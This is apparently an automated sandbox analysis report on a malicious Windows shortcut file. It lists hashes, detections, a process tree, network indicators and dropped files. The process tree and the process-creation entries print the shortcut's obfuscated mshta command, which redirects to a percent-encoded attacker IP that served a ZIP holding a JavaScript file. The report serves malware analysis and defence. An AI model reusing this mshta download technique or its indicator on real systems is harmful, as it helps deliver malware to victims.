Edit tour

Windows Analysis Report
aa.LnK.lnk

Overview

General Information

Sample name:	aa.LnK.lnk
Analysis ID:	1524795
MD5:	c15e90f68dc8a127205072910f55ff41
SHA1:	079c39646eb91f4c24152943e5d18c285f6a53e5
SHA256:	342cdec573452a0280dda91354b37cb724e0fbde6744b2ce5d0d6872b8e6bed8
Tags:	lnkuser-abuse_ch
Infos:

Detection

Score:	56
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Windows shortcut file (LNK) starts blacklisted processes

AI detected suspicious sample

Found suspicious ZIP file

JA3 SSL client fingerprint seen in connection with other malware

Queries the volume information (name, serial number etc) of a device

Searches for the Microsoft Outlook file path

Sigma detected: Use Short Name Path in Command Line

Classification

Process Tree

System is w10x64

mshta.exe (PID: 3648 cmdline: "C:\Windows\System32\mshta.exe" "javascript:window.location.href='%68%74%74%70%73%3A%2F%2F%31%30%32%2E%31%36%35%2E%34%36%2E%31%34%35%2F';close();" MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)

iexplore.exe (PID: 6228 cmdline: "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding MD5: CFE2E6942AC1B72981B3105E22D3224E)

iexplore.exe (PID: 2064 cmdline: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6228 CREDAT:17410 /prefetch:2 MD5: 6F0F06D6AB125A99E43335427066A4A1)

ssvagent.exe (PID: 2676 cmdline: "C:\PROGRA~2\Java\jre-1.8\bin\ssvagent.exe" -new MD5: F9A898A606E7F5A1CD7CFFA8079253A0)

iexplore.exe (PID: 1008 cmdline: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6228 CREDAT:17414 /prefetch:2 MD5: 6F0F06D6AB125A99E43335427066A4A1)

cleanup

Sigma Signatures

System Summary

Sigma detected: Use Short Name Path in Command Line

Source: Process started

Author: frack113, Nasreddine Bencherchali: Data: Command: "C:\PROGRA~2\Java\jre-1.8\bin\ssvagent.exe" -new, CommandLine: "C:\PROGRA~2\Java\jre-1.8\bin\ssvagent.exe" -new, CommandLine|base64offset|contains: w, Image: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe, NewProcessName: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe, OriginalFileName: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe, ParentCommandLine: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6228 CREDAT:17410 /prefetch:2, ParentImage: C:\Program Files (x86)\Internet Explorer\iexplore.exe, ParentProcessId: 2064, ParentProcessName: iexplore.exe, ProcessCommandLine: "C:\PROGRA~2\Java\jre-1.8\bin\ssvagent.exe" -new, ProcessId: 2676, ProcessName: ssvagent.exe

Sigma detected: Modification of IE Registry Settings

Source: Registry Key set

Author: frack113: Data: Details: 1, EventID: 13, EventType: SetValue, Image: C:\Program Files\Internet Explorer\iexplore.exe, ProcessId: 6228, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\SecuritySafe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 84.2% probability

Source: unknown	HTTPS traffic detected: 102.165.46.145:443 -> 192.168.2.6:49723 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 102.165.46.145:443 -> 192.168.2.6:49724 version: TLS 1.2

Source: Joe Sandbox View

JA3 fingerprint: 82dc2ea333123943700c0f6b3022789a

Source: unknown	TCP traffic detected without corresponding DNS query: 102.165.46.145
Source: unknown	TCP traffic detected without corresponding DNS query: 102.165.46.145
Source: unknown	TCP traffic detected without corresponding DNS query: 102.165.46.145
Source: unknown	TCP traffic detected without corresponding DNS query: 102.165.46.145
Source: unknown	TCP traffic detected without corresponding DNS query: 102.165.46.145
Source: unknown	TCP traffic detected without corresponding DNS query: 102.165.46.145
Source: unknown	TCP traffic detected without corresponding DNS query: 102.165.46.145
Source: unknown	TCP traffic detected without corresponding DNS query: 102.165.46.145
Source: unknown	TCP traffic detected without corresponding DNS query: 102.165.46.145
Source: unknown	TCP traffic detected without corresponding DNS query: 102.165.46.145
Source: unknown	TCP traffic detected without corresponding DNS query: 102.165.46.145
Source: unknown	TCP traffic detected without corresponding DNS query: 102.165.46.145
Source: unknown	TCP traffic detected without corresponding DNS query: 102.165.46.145
Source: unknown	TCP traffic detected without corresponding DNS query: 102.165.46.145
Source: unknown	TCP traffic detected without corresponding DNS query: 102.165.46.145
Source: unknown	TCP traffic detected without corresponding DNS query: 102.165.46.145

Source: global traffic

HTTP traffic detected: GET / HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-CHUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: 102.165.46.145Connection: Keep-Alive

Source: mshta.exe, 00000001.00000002.2322453260.000001412703D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.2297663983.00000141270A3000.00000004.00000020.00020000.00000000.sdmp, {DC241728-8157-11EF-8C2D-ECF4BB2D2496}.dat.4.dr, ~DF3A347E01C7E1A4F8.TMP.4.dr	String found in binary or memory: https://102.165.46.145/
Source: mshta.exe, 00000001.00000002.2322453260.000001412707E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://102.165.46.145/-;
Source: mshta.exe, 00000001.00000002.2322453260.000001412702C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://102.165.46.145/2288
Source: mshta.exe, 00000001.00000002.2322453260.000001412702C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://102.165.46.145/n

Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723

Source: unknown	HTTPS traffic detected: 102.165.46.145:443 -> 192.168.2.6:49723 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 102.165.46.145:443 -> 192.168.2.6:49724 version: TLS 1.2

System Summary

Found suspicious ZIP file

Source: DocumentoRserva30513[1].zip.7.dr

Zip Entry: reserva/Donejoao.js

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Jump to behavior

Source: classification engine

Classification label: mal56.winLNK@8/10@0/1

Source: C:\Program Files\Internet Explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery

Jump to behavior

Source: C:\Program Files\Internet Explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Temp\~DF9C40BA2442EF5D9D.TMP

Jump to behavior

Source: C:\Program Files\Internet Explorer\iexplore.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\mshta.exe "C:\Windows\System32\mshta.exe" "javascript:window.location.href='%68%74%74%70%73%3A%2F%2F%31%30%32%2E%31%36%35%2E%34%36%2E%31%34%35%2F';close();"
Source: unknown	Process created: C:\Program Files\Internet Explorer\iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
Source: C:\Program Files\Internet Explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6228 CREDAT:17410 /prefetch:2
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe	Process created: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe "C:\PROGRA~2\Java\jre-1.8\bin\ssvagent.exe" -new
Source: C:\Program Files\Internet Explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6228 CREDAT:17414 /prefetch:2
Source: C:\Program Files\Internet Explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6228 CREDAT:17410 /prefetch:2	Jump to behavior
Source: C:\Program Files\Internet Explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6228 CREDAT:17414 /prefetch:2	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe	Process created: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe "C:\PROGRA~2\Java\jre-1.8\bin\ssvagent.exe" -new	Jump to behavior

Source: C:\Windows\System32\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: mshtml.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msiso.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msimtf.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dataexchange.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dcomp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: jscript9.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d2d1.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dxcore.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe	Section loaded: uxtheme.dll	Jump to behavior

Source: C:\Windows\System32\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32

Jump to behavior

Source: aa.LnK.lnk

LNK file: ..\..\..\Windows\System32\mshta.exe

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Lync

Jump to behavior

Persistence and Installation Behavior

Windows shortcut file (LNK) starts blacklisted processes

Source: LNK file

Process created: C:\Windows\System32\mshta.exe

Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: mshta.exe, 00000001.00000002.2322453260.0000014127059000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\System32\mshta.exe

Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation

Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	1 Process Injection	1 Masquerading	OS Credential Dumping	1 Security Software Discovery	Remote Services	1 Email Collection	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Process Injection	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 DLL Side-Loading	Security Account Manager	1 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	13 System Information Discovery	Distributed Component Object Model	Input Capture	1 Ingress Tool Transfer	Traffic Duplication	Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
aa.LnK.lnk	11%	ReversingLabs	Binary.Malware.Nioc

Source	Detection	Scanner	Label	Link
https://102.165.46.145/	1%	Virustotal		Browse

Name	Malicious	Antivirus Detection	Reputation
https://102.165.46.145/	false	1%, Virustotal, Browse	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://102.165.46.145/2288	mshta.exe, 00000001.00000002.2322453260.000001412702C000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://102.165.46.145/n	mshta.exe, 00000001.00000002.2322453260.000001412702C000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://102.165.46.145/-;	mshta.exe, 00000001.00000002.2322453260.000001412707E000.00000004.00000020.00020000.00000000.sdmp	false	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
102.165.46.145	unknown	South Africa		134121	RAINBOW-HKRainbownetworklimitedHK	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1524795
Start date and time:	2024-10-03 09:18:44 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 11s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	12
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	aa.LnK.lnk
Detection:	MAL
Classification:	mal56.winLNK@8/10@0/1
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 1 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .lnk

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, ielowutil.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 184.28.89.167, 2.23.209.149, 2.23.209.158, 2.23.209.182, 2.23.209.176, 2.23.209.179, 2.23.209.189, 2.23.209.177, 2.23.209.185, 2.23.209.150, 204.79.197.200
Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, www-www.bing.com.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, e11290.dspg.akamaiedge.net, go.microsoft.com, e86303.dscx.akamaiedge.net, any.edge.bing.com, ocsp.digicert.com, www.bing.com.edgekey.net, go.microsoft.com.edgekey.net, ieonline.microsoft.com
Execution Graph export aborted for target mshta.exe, PID 3648 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetValueKey calls found.

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
RAINBOW-HKRainbownetworklimitedHK	lK1DKi27B4.dll	Get hash	malicious	Unknown	Browse	85.239.52.252
	lK1DKi27B4.dll	Get hash	malicious	Unknown	Browse	85.239.52.252
	nPyo7vtpRl.dll	Get hash	malicious	Unknown	Browse	45.86.230.68
	rdl3kBqbTy.dll	Get hash	malicious	Unknown	Browse	45.86.230.68
	nPyo7vtpRl.dll	Get hash	malicious	Unknown	Browse	45.86.230.68
	rdl3kBqbTy.dll	Get hash	malicious	Unknown	Browse	45.86.230.68
	file.exe	Get hash	malicious	Unknown	Browse	85.239.52.241
	file.exe	Get hash	malicious	Unknown	Browse	85.239.52.241
	Havarti.dll	Get hash	malicious	Unknown	Browse	45.86.230.68
	https://www.izmailovo.ru/contacts/	Get hash	malicious	HTMLPhisher	Browse	45.92.176.235

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
82dc2ea333123943700c0f6b3022789a	Payment advice.xls	Get hash	malicious	Unknown	Browse	102.165.46.145

Process:	C:\Program Files\Internet Explorer\iexplore.exe
File Type:	MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
Category:	dropped
Size (bytes):	4286
Entropy (8bit):	3.8046022951415335
Encrypted:	false
SSDEEP:	24:suZOWcCXPRS4QAUs/KBy3TYI42Apvl6wheXpktCH2Yn4KgISQggggFpz1k9PAYHu:HBRh+sCBykteatiBn4KWi1+Ne
MD5:	DA597791BE3B6E732F0BC8B20E38EE62
SHA1:	1125C45D285C360542027D7554A5C442288974DE
SHA-256:	5B2C34B3C4E8DD898B664DBA6C3786E2FF9869EFF55D673AA48361F11325ED07
SHA-512:	D8DC8358727590A1ED74DC70356AEDC0499552C2DC0CD4F7A01853DD85CEB3AEAD5FBDC7C75D7DA36DB6AF2448CE5ABDFF64CEBDCA3533ECAD953C061A9B338E
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	...... .... .........(... ...@..... ...................................................................................................................................................................................................N...Sz..R...R...P...N..L..H..DG..........................................................................................R6..U...U...S...R...P...N..L..I..F..B...7...............................................................................S6..V...V...U...S...R...P...N..L..I..F..C...?..:z......................................................................O...W...V...V...U...S...R...P...N..L..I..E..C...?...;..{7..q2$..............................................................T..D..]...S)..p6..J...R...P...N..L..I..E..B..>..;..z7..p2..f,X.........................................................A..O#..N!..N!..N!..P$..q:...P...N..K..I..E..A..=..9..x5..n0..e,...5...................................................Ea.Z,..T$..T$..T

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{DC241724-8157-11EF-8C2D-ECF4BB2D2496}.dat

Download File

Process:	C:\Program Files\Internet Explorer\iexplore.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	6144
Entropy (8bit):	2.5900896011035437
Encrypted:	false
SSDEEP:	24:r8GW/Y3GW/QdkwPQbzMMLTzMMZlW8MUHZQS9lW8twT+MuL69lW8hMuL:r8GWeGW42N0TH8x5QL8tvvLD8hvL
MD5:	B3FC201EC1B775FA798FB912F50C6B56
SHA1:	CB6015C8F53439BC8F9E05CC5DC9DC4FDCA1D423
SHA-256:	B62CF068DF209F62CC510A604364882BF1834C5F01827291D206E259BCF55845
SHA-512:	D935758766B99D1F6738928CA88FD630BC4171CBAB92AF4EF8444852D65FACA6521CA524A18FB286462B684251429569286E8FAB71F99771AE6DB17FED8E5AC6
Malicious:	false
Preview:	......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.........................................................................................`..d.......@.........K.j.j.a.q.f.a.j.N.2.c.0.u.z.g.v.1.l.4.q.y.5.n.f.W.e...........8...............................................................F.r.a.m.e.L.i.s.t...............................................................................................................O._.T.S.J.R.c.k.3.F.e.B.7.x.G.M.L.e.z.0.u.y.0.k.l.g.=.=.........:.......................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{DC241726-8157-11EF-8C2D-ECF4BB2D2496}.dat

Download File

Process:	C:\Program Files\Internet Explorer\iexplore.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	1.7223027633152592
Encrypted:	false
SSDEEP:	12:rl0oXGFTkZiXDrEgm8Gf76FZlXDrEgm8Gn7qw9lgOjg0tz/9lLahd0tyC:rvWG8FlTG8m9l28z9la8y
MD5:	EF5FCEDDBEA001B7D6332B6364495AFB
SHA1:	F1844461493E2BF18FBB7C2CE27E2FB3233FD9AA
SHA-256:	6514524FFC5D3399F143BA57AFB557321514C6C0AD8C25714A8CED98FC452982
SHA-512:	8266884082E7B612F75B7D27C0DE412B6B6B5A1B4825C56635ADDAD1675D50D77F32FA01DD8DD4C1B38FB66650B0D218EE97B4A3B938572A3BAD09F46E479E87
Malicious:	false
Preview:	......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.............................................................................................d.................K.j.j.a.q.f.a.j.N.2.c.0.u.z.g.v.1.l.4.q.y.5.n.f.W.e...........8.......................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{DC241728-8157-11EF-8C2D-ECF4BB2D2496}.dat

Download File

Process:	C:\Program Files\Internet Explorer\iexplore.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	3584
Entropy (8bit):	1.7228480451050143
Encrypted:	false
SSDEEP:	12:rlxAF7KrEgmfe7KF/xrEgmfAB7qw9l+atN0truOUxFo:reKGDxGe9lV8ruOn
MD5:	5AAB43FEA026DF926CC8555E28744A5F
SHA1:	333A7E22C94DB602F528F3B8410FC297C0BB0550
SHA-256:	E25D7E6E6CD466ED47F6F3E74EC501DAF2E99F5B4A9425AA7D7E725785E9A7D0
SHA-512:	3B76C212DA972A179296A3EEF83AAA645131AC3CF351FFC7578426A4E439CB259CED3957A614238340DB42B741231EFEA47937879B7959A0860FF19B2F94C1D0
Malicious:	false
Preview:	......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y..........................................................................................Ab.d.................K.j.j.a.q.f.a.j.N.2.c.0.u.z.g.v.1.l.4.q.y.5.n.f.W.e...........8...............................................................T.r.a.v.e.l.L.o.g.......................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\favicon[1].ico

Download File

Process:	C:\Program Files\Internet Explorer\iexplore.exe
File Type:	MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
Category:	dropped
Size (bytes):	4286
Entropy (8bit):	3.8046022951415335
Encrypted:	false
SSDEEP:	24:suZOWcCXPRS4QAUs/KBy3TYI42Apvl6wheXpktCH2Yn4KgISQggggFpz1k9PAYHu:HBRh+sCBykteatiBn4KWi1+Ne
MD5:	DA597791BE3B6E732F0BC8B20E38EE62
SHA1:	1125C45D285C360542027D7554A5C442288974DE
SHA-256:	5B2C34B3C4E8DD898B664DBA6C3786E2FF9869EFF55D673AA48361F11325ED07
SHA-512:	D8DC8358727590A1ED74DC70356AEDC0499552C2DC0CD4F7A01853DD85CEB3AEAD5FBDC7C75D7DA36DB6AF2448CE5ABDFF64CEBDCA3533ECAD953C061A9B338E
Malicious:	false
Preview:	...... .... .........(... ...@..... ...................................................................................................................................................................................................N...Sz..R...R...P...N..L..H..DG..........................................................................................R6..U...U...S...R...P...N..L..I..F..B...7...............................................................................S6..V...V...U...S...R...P...N..L..I..F..C...?..:z......................................................................O...W...V...V...U...S...R...P...N..L..I..E..C...?...;..{7..q2$..............................................................T..D..]...S)..p6..J...R...P...N..L..I..E..B..>..;..z7..p2..f,X.........................................................A..O#..N!..N!..N!..P$..q:...P...N..K..I..E..A..=..9..x5..n0..e,...5...................................................Ea.Z,..T$..T$..T

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\DocumentoRserva30513[1].zip

Download File

Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	Zip archive data, at least v1.0 to extract, compression method=store
Category:	dropped
Size (bytes):	2049
Entropy (8bit):	7.590953038347895
Encrypted:	false
SSDEEP:	48:5bQex+XKuzRWFXsBdQQQzUInFSMfh5BvQPNCJgjQJhW0QcVF5ve+yCB:aeYLRIsBdYzUqHoFC6jQHQcVF5cCB
MD5:	CBCB5D352D50305C91D8BF03BB3729B7
SHA1:	94E07C98535DF8F9896511322FB02F959799EFB5
SHA-256:	D7FC49EA22BA4176919A7342BA7909EBFC5F76EC4031908BF3262F510030A8D9
SHA-512:	7A67BF8B962E174D2227A34001489B2A7170D7C793A7AF8A02F34D10428F1D7F83BF8D27B90203878C5CE197F81D3D60D6E5D35BA09A3E64C5B2CBBD773F113A
Malicious:	false
